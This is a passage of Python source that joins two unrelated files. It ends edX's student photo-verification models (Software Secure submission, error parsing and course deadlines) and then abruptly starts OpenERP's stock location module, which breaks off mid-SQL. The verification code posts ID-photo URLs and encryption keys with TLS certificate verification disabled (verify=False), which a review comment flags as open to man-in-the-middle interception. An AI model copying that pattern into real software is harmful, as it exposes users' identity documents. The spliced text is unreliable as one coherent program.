        except Exception:       # pylint: disable=broad-except
            # Broad catch is deliberate: any failure to reach Software Secure
            # should park the attempt in "must_retry", never crash the caller.
            log.exception(
                u'Software Secure submission failed for user %s, setting status to must_retry',
                self.user.username
            )
            self.status = "must_retry"
            self.save()

    def parsed_error_msg(self):
        """
        Parse the error messages we receive from SoftwareSecure

        Error messages are written in the form:

            `[{"photoIdReasons": ["Not provided"]}]`

        Returns:
            str[]: List of error messages.
        """
        parsed_errors = []
        # Maps Software Secure's human-readable reasons to our stable codes.
        error_map = {
            'EdX name not provided': 'name_mismatch',
            'Name mismatch': 'name_mismatch',
            'Photo/ID Photo mismatch': 'photos_mismatched',
            'ID name not provided': 'id_image_missing_name',
            'Invalid Id': 'id_invalid',
            'No text': 'id_invalid',
            'Not provided': 'id_image_missing',
            'Photo hidden/No photo': 'id_image_not_clear',
            'Text not clear': 'id_image_not_clear',
            'Face out of view': 'user_image_not_clear',
            'Image not clear': 'user_image_not_clear',
            'Photo not provided': 'user_image_missing',
        }

        try:
            messages = set()
            message_groups = json.loads(self.error_msg)

            for message_group in message_groups:
                # set(*values) unpacks the group's value — assumes each group
                # dict carries exactly one key whose value is a list of
                # reason strings (as in the example above); TODO confirm.
                messages = messages.union(set(*six.itervalues(message_group)))

            for message in messages:
                parsed_error = error_map.get(message)

                if parsed_error:
                    parsed_errors.append(parsed_error)
                else:
                    log.debug(u'Ignoring photo verification error message: %s', message)
        except Exception:   # pylint: disable=broad-except
            # Unparseable payloads degrade to an empty list rather than raise.
            log.exception(u'Failed to parse error message for SoftwareSecurePhotoVerification %d', self.pk)

        return parsed_errors

    def image_url(self, name, override_receipt_id=None):
        """
        We dynamically generate this, since we want the expiration clock to
        start when the message is created, not when the record is created.

        Arguments:
            name (str): Name of the image (e.g. "photo_id" or "face")

        Keyword Arguments:
            override_receipt_id (str): If provided, use this receipt ID instead
                of the ID for this attempt.  This is useful for reverification
                where we need to construct a URL to a previously-submitted
                photo ID image.

        Returns:
            string: The expiring URL for the image.

        """
        path = self._get_path(name, override_receipt_id=override_receipt_id)
        return self._storage.url(path)

    @cached_property
    def _storage(self):
        """
        Return the configured django storage backend.
        """
        config = settings.VERIFY_STUDENT["SOFTWARE_SECURE"]

        # Default to the S3 backend for backward compatibility
        storage_class = config.get("STORAGE_CLASS", "storages.backends.s3boto.S3BotoStorage")
        storage_kwargs = config.get("STORAGE_KWARGS", {})

        # Map old settings to the parameters expected by the storage backend
        if "AWS_ACCESS_KEY" in config:
            storage_kwargs["access_key"] = config["AWS_ACCESS_KEY"]
        if "AWS_SECRET_KEY" in config:
            storage_kwargs["secret_key"] = config["AWS_SECRET_KEY"]
        if "S3_BUCKET" in config:
            storage_kwargs["bucket"] = config["S3_BUCKET"]
            storage_kwargs["querystring_expire"] = self.IMAGE_LINK_DURATION
        
        return get_storage(storage_class, **storage_kwargs)

    def _get_path(self, prefix, override_receipt_id=None):
        """
        Returns the path to a resource with this instance's `receipt_id`.

        If `override_receipt_id` is given, the path to that resource will be
        retrieved instead. This allows us to retrieve images submitted in
        previous attempts (used for reverification, where we send a new face
        photo with the same photo ID from a previous attempt).
        """
        receipt_id = self.receipt_id if override_receipt_id is None else override_receipt_id
        return os.path.join(prefix, receipt_id)

    def _encrypted_user_photo_key_str(self):
        """
        Software Secure needs to have both UserPhoto and PhotoID decrypted in
        the same manner. So even though this is going to be the same for every
        request, we're also using RSA encryption to encrypt the AES key for
        faces.
        """
        # See upload_face_image for the py2-only hex/base64 codec caveats.
        face_aes_key_str = settings.VERIFY_STUDENT["SOFTWARE_SECURE"]["FACE_IMAGE_AES_KEY"]
        face_aes_key = face_aes_key_str.decode("hex")
        rsa_key_str = settings.VERIFY_STUDENT["SOFTWARE_SECURE"]["RSA_PUBLIC_KEY"]
        rsa_encrypted_face_aes_key = rsa_encrypt(face_aes_key, rsa_key_str)

        return rsa_encrypted_face_aes_key.encode("base64")

    def create_request(self, copy_id_photo_from=None):
        """
        Construct the HTTP request to the photo verification service.

        Keyword Arguments:
            copy_id_photo_from (SoftwareSecurePhotoVerification): If provided, re-send the ID photo
                data from this attempt.  This is used for reverification, in which new face photos
                are sent with previously-submitted ID photos.

        Returns:
            tuple of (header, body), where both `header` and `body` are dictionaries.

        """
        access_key = settings.VERIFY_STUDENT["SOFTWARE_SECURE"]["API_ACCESS_KEY"]
        secret_key = settings.VERIFY_STUDENT["SOFTWARE_SECURE"]["API_SECRET_KEY"]

        scheme = "https" if settings.HTTPS == "on" else "http"
        callback_url = "{}://{}{}".format(
            scheme, settings.SITE_NAME, reverse('verify_student_results_callback')
        )

        # If we're copying the photo ID image from a previous verification attempt,
        # then we need to send the old image data with the correct image key.
        photo_id_url = (
            self.image_url("photo_id")
            if copy_id_photo_from is None
            else self.image_url("photo_id", override_receipt_id=copy_id_photo_from.receipt_id)
        )

        photo_id_key = (
            self.photo_id_key
            if copy_id_photo_from is None else
            copy_id_photo_from.photo_id_key
        )

        body = {
            "EdX-ID": str(self.receipt_id),
            "ExpectedName": self.name,
            "PhotoID": photo_id_url,
            "PhotoIDKey": photo_id_key,
            "SendResponseTo": callback_url,
            "UserPhoto": self.image_url("face"),
            "UserPhotoKey": self._encrypted_user_photo_key_str(),
        }
        headers = {
            "Content-Type": "application/json",
            "Date": formatdate(timeval=None, localtime=False, usegmt=True)
        }
        # HMAC-style signing over method + headers + body; the signature goes
        # into the Authorization header Software Secure validates.
        _message, _sig, authorization = generate_signed_message(
            "POST", headers, body, access_key, secret_key
        )
        headers['Authorization'] = authorization

        return headers, body

    def request_message_txt(self):
        """
        This is the body of the request we send across. This is never actually
        used in the code, but exists for debugging purposes -- you can call
        `print attempt.request_message_txt()` on the console and get a readable
        rendering of the request that would be sent across, without actually
        sending anything.
        """
        headers, body = self.create_request()

        header_txt = "\n".join(
            u"{}: {}".format(h, v) for h, v in sorted(headers.items())
        )
        body_txt = json.dumps(body, indent=2, sort_keys=True, ensure_ascii=False).encode('utf-8')

        return header_txt + "\n\n" + body_txt

    def send_request(self, copy_id_photo_from=None):
        """
        Assembles a submission to Software Secure and sends it via HTTPS.

        Keyword Arguments:
            copy_id_photo_from (SoftwareSecurePhotoVerification): If provided, re-send the ID photo
                data from this attempt.  This is used for reverification, in which new face photos
                are sent with previously-submitted ID photos.

        Returns:
            request.Response

        """
        # If AUTOMATIC_VERIFY_STUDENT_IDENTITY_FOR_TESTING is True, we want to
        # skip posting anything to Software Secure. We actually don't even
        # create the message because that would require encryption and message
        # signing that rely on settings.VERIFY_STUDENT values that aren't set
        # in dev. So we just pretend like we successfully posted
        if settings.FEATURES.get('AUTOMATIC_VERIFY_STUDENT_IDENTITY_FOR_TESTING'):
            fake_response = requests.Response()
            fake_response.status_code = 200
            return fake_response

        headers, body = self.create_request(copy_id_photo_from=copy_id_photo_from)
        # NOTE(review): verify=False disables TLS certificate verification for
        # this request, which permits man-in-the-middle interception of the
        # image URLs and keys. Confirm whether this is still required and
        # consider pinning/enabling verification.
        response = requests.post(
            settings.VERIFY_STUDENT["SOFTWARE_SECURE"]["API_URL"],
            headers=headers,
            data=json.dumps(body, indent=2, sort_keys=True, ensure_ascii=False).encode('utf-8'),
            verify=False
        )

        log.info(u"Sent request to Software Secure for receipt ID %s.", self.receipt_id)
        if copy_id_photo_from is not None:
            log.info(
                (
                    u"Software Secure attempt with receipt ID %s used the same photo ID "
                    u"data as the receipt with ID %s"
                ),
                self.receipt_id, copy_id_photo_from.receipt_id
            )

        log.debug("Headers:\n{}\n\n".format(headers))
        log.debug("Body:\n{}\n\n".format(body))
        log.debug(u"Return code: {}".format(response.status_code))
        log.debug(u"Return message:\n\n{}\n\n".format(response.text))

        return response

    def should_display_status_to_user(self):
        """Whether or not the status from this attempt should be displayed to the user."""
        return True


class VerificationDeadline(TimeStampedModel):
    """
    A per-course cutoff for submitting initial verification photos.

    After a course's deadline passes, users may no longer submit photos for
    initial verification in that course. This is distinct from the "upgrade"
    deadline, which governs when a user may still upgrade to a verified
    enrollment.

    A course with no VerificationDeadline record has no deadline at all:
    photos may be submitted at any time.

    .. no_pii:
    """
    class Meta(object):
        app_label = "verify_student"

    course_key = CourseKeyField(
        max_length=255,
        db_index=True,
        unique=True,
        help_text=ugettext_lazy(u"The course for which this deadline applies"),
    )

    deadline = models.DateTimeField(
        help_text=ugettext_lazy(
            u"The datetime after which users are no longer allowed "
            "to submit photos for verification."
        )
    )

    # Normally maintained automatically from default settings; when a human
    # sets the deadline by hand this flag records that fact so automatic
    # updates know not to overwrite the manual value.
    deadline_is_explicit = models.BooleanField(default=False)

    # Cache key under which the full course_key -> deadline map is stored.
    ALL_DEADLINES_CACHE_KEY = "verify_student.all_verification_deadlines"

    @classmethod
    def set_deadline(cls, course_key, deadline, is_explicit=False):
        """
        Configure the verification deadline for a course.

        Passing `deadline=None` removes any deadline, letting users verify
        for the course at any time.

        Arguments:
            course_key (CourseKey): Identifier for the course.
            deadline (datetime or None): The verification deadline.

        """
        if deadline is None:
            # No deadline means no record at all.
            VerificationDeadline.objects.filter(course_key=course_key).delete()
            return

        record, created = VerificationDeadline.objects.get_or_create(
            course_key=course_key,
            defaults={"deadline": deadline, "deadline_is_explicit": is_explicit}
        )
        if created:
            return

        # Record already existed: overwrite its deadline and provenance flag.
        record.deadline = deadline
        record.deadline_is_explicit = is_explicit
        record.save()

    @classmethod
    def deadlines_for_courses(cls, course_keys):
        """
        Retrieve verification deadlines for particular courses.

        Arguments:
            course_keys (list): List of `CourseKey`s.

        Returns:
            dict: Map of course keys to datetimes (verification deadlines)

        """
        # The full map is cached; signal handlers invalidate it on any change.
        deadlines_by_course = cache.get(cls.ALL_DEADLINES_CACHE_KEY)
        if deadlines_by_course is None:
            deadlines_by_course = dict(
                (record.course_key, record.deadline)
                for record in VerificationDeadline.objects.all()
            )
            cache.set(cls.ALL_DEADLINES_CACHE_KEY, deadlines_by_course)

        # Courses without a deadline are simply absent from the result.
        result = {}
        for course_key in course_keys:
            if course_key in deadlines_by_course:
                result[course_key] = deadlines_by_course[course_key]
        return result

    @classmethod
    def deadline_for_course(cls, course_key):
        """
        Retrieve the verification deadline for a particular course.

        Arguments:
            course_key (CourseKey): The identifier for the course.

        Returns:
            datetime or None

        """
        try:
            return cls.objects.get(course_key=course_key).deadline
        except cls.DoesNotExist:
            return None


@receiver(models.signals.post_save, sender=VerificationDeadline)
@receiver(models.signals.post_delete, sender=VerificationDeadline)
def invalidate_deadline_caches(sender, **kwargs):  # pylint: disable=unused-argument
    """Invalidate the cached verification deadline information.

    Fires whenever a VerificationDeadline is saved or deleted, so
    VerificationDeadline.deadlines_for_courses rebuilds its cache on
    next access.
    """
    cache.delete(VerificationDeadline.ALL_DEADLINES_CACHE_KEY)

# -*- coding: utf-8 -*-
##############################################################################
#
#    OpenERP, Open Source Management Solution
#    Copyright (C) 2004-2010 Tiny SPRL (<http://tiny.be>).
#
#    This program is free software: you can redistribute it and/or modify
#    it under the terms of the GNU Affero General Public License as
#    published by the Free Software Foundation, either version 3 of the
#    License, or (at your option) any later version.
#
#    This program is distributed in the hope that it will be useful,
#    but WITHOUT ANY WARRANTY; without even the implied warranty of
#    MERCHANTABILITY or FITNESS FOR A PARTICULAR PURPOSE.  See the
#    GNU Affero General Public License for more details.
#
#    You should have received a copy of the GNU Affero General Public License
#    along with this program.  If not, see <http://www.gnu.org/licenses/>.
#
##############################################################################

from datetime import datetime
from dateutil.relativedelta import relativedelta
import time
from operator import itemgetter
from itertools import groupby

from openerp.osv import fields, osv, orm
from openerp.tools.translate import _
from openerp import netsvc
from openerp import tools
from openerp.tools import float_compare, DEFAULT_SERVER_DATETIME_FORMAT
import openerp.addons.decimal_precision as dp
import logging
_logger = logging.getLogger(__name__)

#----------------------------------------------------------
# Incoterms
#----------------------------------------------------------
class stock_incoterms(osv.osv):
    """OSV model holding the catalogue of Incoterms (international commercial terms)."""
    _name = "stock.incoterms"
    _description = "Incoterms"
    # Declarative column definitions (legacy OpenERP osv API).
    _columns = {
        'name': fields.char('Name', size=64, required=True, help="Incoterms are series of sales terms.They are used to divide transaction costs and responsibilities between buyer and seller and reflect state-of-the-art transportation practices."),
        'code': fields.char('Code', size=3, required=True, help="Code for Incoterms"),
        'active': fields.boolean('Active', help="By unchecking the active field, you may hide an INCOTERM without deleting it."),
    }
    _defaults = {
        # New incoterms are visible by default; deactivate to hide, not delete.
        'active': True,
    }

# Legacy OpenERP registration call (instantiates the model into the pool).
stock_incoterms()

class stock_journal(osv.osv):
    """OSV model for stock journals, used to group stock moves by responsible user."""
    _name = "stock.journal"
    _description = "Stock Journal"
    _columns = {
        'name': fields.char('Stock Journal', size=32, required=True),
        'user_id': fields.many2one('res.users', 'Responsible'),
    }
    _defaults = {
        # Default the responsible user to whoever creates the journal
        # (lambda args: self, cr, uid, context — uid is the creating user).
        'user_id': lambda s, c, u, ctx: u
    }

# Legacy OpenERP registration call (instantiates the model into the pool).
stock_journal()

#----------------------------------------------------------
# Stock Location
#----------------------------------------------------------
class stock_location(osv.osv):
    """Warehouse location, organised as a tree via ``location_id``."""
    _name = "stock.location"
    _description = "Location"
    # parent link field used by the hierarchy machinery
    _parent_name = "location_id"
    # maintain nested-set columns (parent_left/parent_right, declared in
    # _columns below) for fast 'child_of' searches on the tree
    _parent_store = True
    _parent_order = 'posz,name'
    _order = 'parent_left'

    # TODO: implement name_search() in a way that matches the results of name_get!

    def name_get(self, cr, uid, ids, context=None):
        """Return (id, display name) pairs, always as the full hierarchical path."""
        # Delegate to the function-field computation so the display name
        # matches the stored 'complete_name' ("Parent / ... / Self").
        full_names = self._complete_name(cr, uid, ids, 'complete_name', None, context=context)
        return [(location_id, name) for location_id, name in full_names.items()]

    def _complete_name(self, cr, uid, ids, name, args, context=None):
        """Build the fully qualified location name ("Ancestor / ... / Self").

        @return: dict mapping each location id to its complete name
        """
        res = {}
        for location in self.browse(cr, uid, ids, context=context):
            # walk up the hierarchy, prepending each ancestor's name
            parts = [location.name]
            ancestor = location.location_id
            while ancestor:
                parts.insert(0, ancestor.name)
                ancestor = ancestor.location_id
            res[location.id] = ' / '.join(parts)
        return res

    def _get_sublocations(self, cr, uid, ids, context=None):
        """Return the ids of the given stock locations and all their descendants
        (the given locations themselves are included)."""
        domain = [('id', 'child_of', ids)]
        return self.search(cr, uid, domain, context=context)

    def _product_value(self, cr, uid, ids, field_names, arg, context=None):
        """Computes stock value (real and virtual) for a product, as well as stock qty (real and virtual).
        @param field_names: Name of field — any of 'stock_real',
            'stock_virtual', 'stock_real_value', 'stock_virtual_value'
        @return: Dictionary of values, one sub-dict per location id
        """
        # The product to evaluate is passed through the context; without it
        # there is nothing to compute, so return zeroed entries for all ids.
        prod_id = context and context.get('product_id', False)

        if not prod_id:
            return dict([(i, {}.fromkeys(field_names, 0.0)) for i in ids])

        product_product_obj = self.pool.get('product.product')

        # Collect every (product, location) pair that ever had a move out of
        # (first query) or into (second query) the requested locations.
        cr.execute('select distinct product_id, location_id from stock_move where location_id in %s', (tuple(ids), ))
        dict1 = cr.dictfetchall()
        cr.execute('select distinct product_id, location_dest_id as location_id from stock_move where location_dest_id in %s', (tuple(ids), ))
        dict2 = cr.dictfetchall()
        # itertools.groupby needs the rows sorted on the grouping key
        res_products_by_location = sorted(dict1+dict2, key=itemgetter('location_id'))
        products_by_location = dict((k, [v['product_id'] for v in itr]) for k, itr in groupby(res_products_by_location, itemgetter('location_id')))

        # Seed every requested id (plus every location seen in the moves)
        # with zeroes so locations without activity still appear.
        result = dict([(i, {}.fromkeys(field_names, 0.0)) for i in ids])
        result.update(dict([(i, {}.fromkeys(field_names, 0.0)) for i in list(set([aaa['location_id'] for aaa in res_products_by_location]))]))

        # Amounts are rounded in the user's company currency.
        currency_id = self.pool.get('res.users').browse(cr, uid, uid).company_id.currency_id.id
        currency_obj = self.pool.get('res.currency')
        currency = currency_obj.browse(cr, uid, currency_id, context=context)
        for loc_id, product_ids in products_by_location.items():
            if prod_id:
                # prod_id is always truthy here (checked above): restrict the
                # computation to the single product from the context
                product_ids = [prod_id]
            c = (context or {}).copy()
            # qty_available / virtual_available are computed per location
            # through the 'location' context key
            c['location'] = loc_id
            for prod in product_product_obj.browse(cr, uid, product_ids, context=c):
                for f in field_names:
                    if f == 'stock_real':
                        # defensive guard; result is pre-seeded above so this
                        # branch appears unreachable in practice
                        if loc_id not in result:
                            result[loc_id] = {}
                        result[loc_id][f] += prod.qty_available
                    elif f == 'stock_virtual':
                        result[loc_id][f] += prod.virtual_available
                    elif f == 'stock_real_value':
                        amount = prod.qty_available * prod.standard_price
                        amount = currency_obj.round(cr, uid, currency, amount)
                        result[loc_id][f] += amount
                    elif f == 'stock_virtual_value':
                        amount = prod.virtual_available * prod.standard_price
                        amount = currency_obj.round(cr, uid, currency, amount)
                        result[loc_id][f] += amount
        return result

    _columns = {
        'name': fields.char('Location Name', size=64, required=True, translate=True),
        'active': fields.boolean('Active', help="By unchecking the active field, you may hide a location without deleting it."),
        'usage': fields.selection([('supplier', 'Supplier Location'), ('view', 'View'), ('internal', 'Internal Location'), ('customer', 'Customer Location'), ('inventory', 'Inventory'), ('procurement', 'Procurement'), ('production', 'Production'), ('transit', 'Transit Location for Inter-Companies Transfers')], 'Location Type', required=True,
                 help="""* Supplier Location: Virtual location representing the source location for products coming from your suppliers
                       \n* View: Virtual location used to create a hierarchical structures for your warehouse, aggregating its child locations ; can't directly contain products
                       \n* Internal Location: Physical locations inside your own warehouses,
                       \n* Customer Location: Virtual location representing the destination location for products sent to your customers
                       \n* Inventory: Virtual location serving as counterpart for inventory operations used to correct stock levels (Physical inventories)
                       \n* Procurement: Virtual location serving as temporary counterpart for procurement operations when the source (supplier or production) is not known yet. This location should be empty when the procurement scheduler has finished running.
                       \n* Production: Virtual counterpart location for production operations: this location consumes the raw material and produces finished products
                      """, select = True),
         # temporarily removed, as it's unused: 'allocation_method': fields.selection([('fifo', 'FIFO'), ('lifo', 'LIFO'), ('nearest', 'Nearest')], 'Allocation Method', required=True),
        # stored function field, recomputed for a whole subtree whenever a
        # name or parent changes (see _get_sublocations trigger)
        'complete_name': fields.function(_complete_name, type='char', size=256, string="Location Name",
                            store={'stock.location': (_get_sublocations, ['name', 'location_id'], 10)}),

        # on-the-fly quantities, computed via _product_value (multi field)
        'stock_real': fields.function(_product_value, type='float', string='Real Stock', multi="stock"),
        'stock_virtual': fields.function(_product_value, type='float', string='Virtual Stock', multi="stock"),

        # tree structure
        'location_id': fields.many2one('stock.location', 'Parent Location', select=True, ondelete='cascade'),
        'child_ids': fields.one2many('stock.location', 'location_id', 'Contains'),

        # --- chaining configuration (see chained_location_get) ---
        'chained_journal_id': fields.many2one('stock.journal', 'Chaining Journal',help="Inventory Journal in which the chained move will be written, if the Chaining Type is not Transparent (no journal is used if left empty)"),
        'chained_location_id': fields.many2one('stock.location', 'Chained Location If Fixed'),
        'chained_location_type': fields.selection([('none', 'None'), ('customer', 'Customer'), ('fixed', 'Fixed Location')],
            'Chained Location Type', required=True,
            help="Determines whether this location is chained to another location, i.e. any incoming product in this location \n" \
                "should next go to the chained location. The chained location is determined according to the type :"\
                "\n* None: No chaining at all"\
                "\n* Customer: The chained location will be taken from the Customer Location field on the Partner form of the Partner that is specified in the Picking list of the incoming products." \
                "\n* Fixed Location: The chained location is taken from the next field: Chained Location if Fixed." \
                ),
        'chained_auto_packing': fields.selection(
            [('auto', 'Automatic Move'), ('manual', 'Manual Operation'), ('transparent', 'Automatic No Step Added')],
            'Chaining Type',
            required=True,
            help="This is used only if you select a chained location type.\n" \
                "The 'Automatic Move' value will create a stock move after the current one that will be "\
                "validated automatically. With 'Manual Operation', the stock move has to be validated "\
                "by a worker. With 'Automatic No Step Added', the location is replaced in the original move."
            ),
        'chained_picking_type': fields.selection([('out', 'Sending Goods'), ('in', 'Getting Goods'), ('internal', 'Internal')], 'Shipping Type', help="Shipping Type of the Picking List that will contain the chained move (leave empty to automatically detect the type based on the source and destination locations)."),
        'chained_company_id': fields.many2one('res.company', 'Chained Company', help='The company the Picking List containing the chained move will belong to (leave empty to use the default company determination rules'),
        'chained_delay': fields.integer('Chaining Lead Time',help="Delay between original move and chained move in days"),
        'partner_id': fields.many2one('res.partner', 'Location Address',help="Address of  customer or supplier."),
        'icon': fields.selection(tools.icons, 'Icon', size=64,help="Icon show in  hierarchical tree view"),

        # --- informational / physical-position fields ---
        'comment': fields.text('Additional Information'),
        'posx': fields.integer('Corridor (X)',help="Optional localization details, for information purpose only"),
        'posy': fields.integer('Shelves (Y)', help="Optional localization details, for information purpose only"),
        # posz also drives sibling ordering (see _parent_order above)
        'posz': fields.integer('Height (Z)', help="Optional localization details, for information purpose only"),

        # nested-set bounds maintained by the ORM (_parent_store)
        'parent_left': fields.integer('Left Parent', select=1),
        'parent_right': fields.integer('Right Parent', select=1),
        'stock_real_value': fields.function(_product_value, type='float', string='Real Stock Value', multi="stock", digits_compute=dp.get_precision('Account')),
        'stock_virtual_value': fields.function(_product_value, type='float', string='Virtual Stock Value', multi="stock", digits_compute=dp.get_precision('Account')),
        'company_id': fields.many2one('res.company', 'Company', select=1, help='Let this field empty if this location is shared between all companies'),
        'scrap_location': fields.boolean('Scrap Location', help='Check this box to allow using this location to put scrapped/damaged goods.'),
        # --- real-time valuation overrides ---
        'valuation_in_account_id': fields.many2one('account.account', 'Stock Valuation Account (Incoming)', domain = [('type','=','other')],
                                                   help="Used for real-time inventory valuation. When set on a virtual location (non internal type), "
                                                        "this account will be used to hold the value of products being moved from an internal location "
                                                        "into this location, instead of the generic Stock Output Account set on the product. "
                                                        "This has no effect for internal locations."),
        'valuation_out_account_id': fields.many2one('account.account', 'Stock Valuation Account (Outgoing)', domain = [('type','=','other')],
                                                   help="Used for real-time inventory valuation. When set on a virtual location (non internal type), "
                                                        "this account will be used to hold the value of products being moved out of this location "
                                                        "and into an internal location, instead of the generic Stock Output Account set on the product. "
                                                        "This has no effect for internal locations."),
    }
    _defaults = {
        'active': True,
        'usage': 'internal',
        'chained_location_type': 'none',
        'chained_auto_packing': 'manual',
        'company_id': lambda self, cr, uid, c: self.pool.get('res.company')._company_default_get(cr, uid, 'stock.location', context=c),
        'posx': 0,
        'posy': 0,
        'posz': 0,
        'icon': False,
        'scrap_location': False,
    }

    def chained_location_get(self, cr, uid, location, partner=None, product=None, context=None):
        """ Finds chained location
        @param location: Location browse record (not an id)
        @param partner: Partner browse record, used when the chaining type
            is 'customer'
        @param product: Product browse record (currently unused here)
        @return: tuple (chained location browse record, chaining type,
            chained delay in days, journal id or False, company id or False,
            picking type, False) when a chained location applies, otherwise
            None / falsy
        """
        result = None
        if location.chained_location_type == 'customer':
            if partner:
                result = partner.property_stock_customer
            else:
                # no partner known: fall back to the default customer
                # location configured on res.partner
                loc_id = self.pool['res.partner'].default_get(cr, uid, ['property_stock_customer'], context=context)['property_stock_customer']
                result = self.pool['stock.location'].browse(cr, uid, loc_id, context=context)
        elif location.chained_location_type == 'fixed':
            result = location.chained_location_id
        if result:
            return result, location.chained_auto_packing, location.chained_delay, location.chained_journal_id and location.chained_journal_id.id or False, location.chained_company_id and location.chained_company_id.id or False, location.chained_picking_type, False
        return result

    def picking_type_get(self, cr, uid, from_location, to_location, context=None):
        """ Gets type of picking.
        @param from_location: Source location browse record
        @param to_location: Destination location browse record (may be empty/False)
        @return: 'out', 'in' or 'internal'
        """
        result = 'internal'
        # BUGFIX: guard to_location in BOTH branches — the original only
        # guarded the first one, so a falsy to_location crashed with an
        # AttributeError in the elif below.
        if (from_location.usage == 'internal') and (to_location and to_location.usage in ('customer', 'supplier')):
            result = 'out'
        elif (from_location.usage in ('supplier', 'customer')) and (to_location and to_location.usage == 'internal'):
            result = 'in'
        return result

    def _product_get_all_report(self, cr, uid, ids, product_ids=False, context=None):
        """Recursive variant of _product_get_report: includes child locations."""
        return self._product_get_report(cr, uid, ids, product_ids,
                                        context=context, recursive=True)

    def _product_get_report(self, cr, uid, ids, product_ids=False,
            context=None, recursive=False):
        """ Finds the product quantity and price for particular location.
        @param product_ids: Ids of product
        @param recursive: True or False — whether to include child locations
        @return: Dictionary with 'product' (list of per-product lines),
                 'total' (total quantity) and 'total_price' (total value)
        """
        if context is None:
            context = {}
        product_obj = self.pool.get('product.product')
        # Take the user company and pricetype
        context['currency_id'] = self.pool.get('res.users').browse(cr, uid, uid, context=context).company_id.currency_id.id

        # To be able to offer recursive or non-recursive reports we need to prevent recursive quantities by default
        context['compute_child'] = False

        if not product_ids:
            # no explicit selection: report on the whole catalog, including
            # inactive products
            product_ids = product_obj.search(cr, uid, [], context={'active_test': False})

        products = product_obj.browse(cr, uid, product_ids, context=context)
        products_by_uom = {}
        products_by_id = {}
        for product in products:
            products_by_uom.setdefault(product.uom_id.id, [])
            products_by_uom[product.uom_id.id].append(product)
            products_by_id.setdefault(product.id, [])
            products_by_id[product.id] = product

        result = {}
        result['product'] = []
        # BUGFIX: the totals were re-initialized inside the location loop, so
        # 'total'/'total_price' only reflected the LAST location and raised a
        # NameError when ``ids`` was empty. Initialize once and accumulate.
        quantity_total = 0.0
        total_price = 0.0
        # the quantity getter is loop-invariant: hoist its selection
        fnc = self._product_all_get if recursive else self._product_get
        for id in ids:
            for uom_id in products_by_uom.keys():
                ctx = context.copy()
                ctx['uom'] = uom_id
                qty = fnc(cr, uid, id, [x.id for x in products_by_uom[uom_id]],
                        context=ctx)
                for product_id in qty.keys():
                    if not qty[product_id]:
                        continue
                    product = products_by_id[product_id]
                    quantity_total += qty[product_id]

                    # Compute based on pricetype
                    # Choose the right field standard_price to read
                    amount_unit = product.price_get('standard_price', context=context)[product.id]
                    price = qty[product_id] * amount_unit

                    total_price += price
                    result['product'].append({
                        'price': amount_unit,
                        'prod_name': product.name,
                        'code': product.default_code, # used by lot_overview_all report!
                        'variants': product.variants or '',
                        'uom': product.uom_id.name,
                        'prod_qty': qty[product_id],
                        'price_value': price,
                    })
        result['total'] = quantity_total
        result['total_price'] = total_price
        return result

    def _product_get_multi_location(self, cr, uid, ids, product_ids=False, context=None,
                                    states=None, what=('in', 'out')):
        """Product availability for the given locations.

        @param product_ids: Ids of product (False for all)
        @param states: List of stock.move states to take into account
            (defaults to ['done'])
        @param what: Tuple of move directions to consider ('in' and/or 'out')
        @return: result of product.product.get_product_available()
        """
        # BUGFIX: ``states`` previously defaulted to the mutable ['done'],
        # shared across calls; use the None sentinel like the sibling
        # helpers (_product_get, _product_all_get) already do.
        if states is None:
            states = ['done']
        product_obj = self.pool.get('product.product')
        if context is None:
            context = {}
        # NOTE(review): a caller-supplied context is mutated in place here;
        # callers in this file appear to rely on passing it through as-is.
        context.update({
            'states': states,
            'what': what,
            'location': ids
        })
        return product_obj.get_product_available(cr, uid, product_ids, context=context)

    def _product_get(self, cr, uid, id, product_ids=False, context=None, states=None):
        """Product availability for a single location (children excluded).

        @param product_ids: Ids of product (False for all)
        @param states: move states to consider, defaults to ['done']
        @return: dict from _product_get_multi_location
        """
        if states is None:
            states = ['done']
        location_ids = [id] if id else []
        return self._product_get_multi_location(cr, uid, location_ids, product_ids, context=context, states=states)

    def _product_all_get(self, cr, uid, id, product_ids=False, context=None, states=None):
        """Product availability for a location and its whole sub-tree."""
        if states is None:
            states = ['done']
        # expand the single id into the full list of descendant locations
        root_ids = [id] if id else []
        location_ids = self.search(cr, uid, [('location_id', 'child_of', root_ids)])
        return self._product_get_multi_location(cr, uid, location_ids, product_ids, context, states)

    def _product_virtual_get(self, cr, uid, id, product_ids=False, context=None, states=None):
        """Virtual (forecast) availability: pending moves count as well.

        NOTE: ``states`` is accepted for signature compatibility with the
        sibling helpers but the computation always uses the fixed forecast
        state list below.
        """
        if states is None:
            states = ['done']
        forecast_states = ['confirmed', 'waiting', 'assigned', 'done']
        return self._product_all_get(cr, uid, id, product_ids, context, forecast_states)

    def _product_reserve(self, cr, uid, ids, product_id, product_qty, context=None, lock=False):
        """
        Attempt to find a quantity ``product_qty`` (in the product's default uom or the uom passed in ``context``) of product ``product_id``
        in locations with id ``ids`` and their child locations. If ``lock`` is True, the stock.move lines
        of product with id ``product_id`` in the searched location will be write-locked using Postgres's
        "FOR UPDATE NOWAIT" option until the transaction is committed or rolled back, to prevent reserving
        twice the same products.
        If ``lock`` is True and the lock cannot be obtained (because another transaction has locked some of
        the same stock.move lines), a log line will be output and False will be returned, as if there was
        not enough stock.

        :param product_id: Id of product to reserve
        :param product_qty: Quantity of product to reserve (in the product's default uom or the uom passed in ``context``)
        :param lock: if True, the stock.move lines of product with id ``product_id`` in all locations (and children locations) with ``ids`` will
                     be write-locked using postgres's "FOR UPDATE NOWAIT" option until the transaction is committed or rolled back. This is
                     to prevent reserving twice the same products.
        :param context: optional context dictionary: if a 'uom' key is present it will be used instead of the default product uom to
                        compute the ``product_qty`` and in the return value.
        :return: List of tuples in the form (qty, location_id) with the (partial) quantities that can be taken in each location to
                 reach the requested product_qty (``qty`` is expressed in the default uom of the product), or False if enough
                 products could not be found, or the lock could not be obtained (and ``lock`` was True).
        """
        result = []
        amount = 0.0
        if context is None:
            context = {}
        uom_obj = self.pool.get('product.uom')
        # rounding precision of the uom the result is compared in: the
        # product's default uom, unless the context forces another one
        uom_rounding = self.pool.get('product.product').browse(cr, uid, product_id, context=context).uom_id.rounding
        if context.get('uom'):
            uom_rounding = uom_obj.browse(cr, uid, context.get('uom'), context=context).rounding

        # consider the requested locations and their whole sub-trees
        locations_ids = self.search(cr, uid, [('location_id', 'child_of', ids)])
        if locations_ids:
            # Fetch only the locations in which this product has ever been processed (in or out)
            cr.execute("""SELECT l.id FROM stock_location l WHERE l.id in %s AND
                        EXISTS (SELECT 1 FROM stock_move m WHERE m.product_id = %s
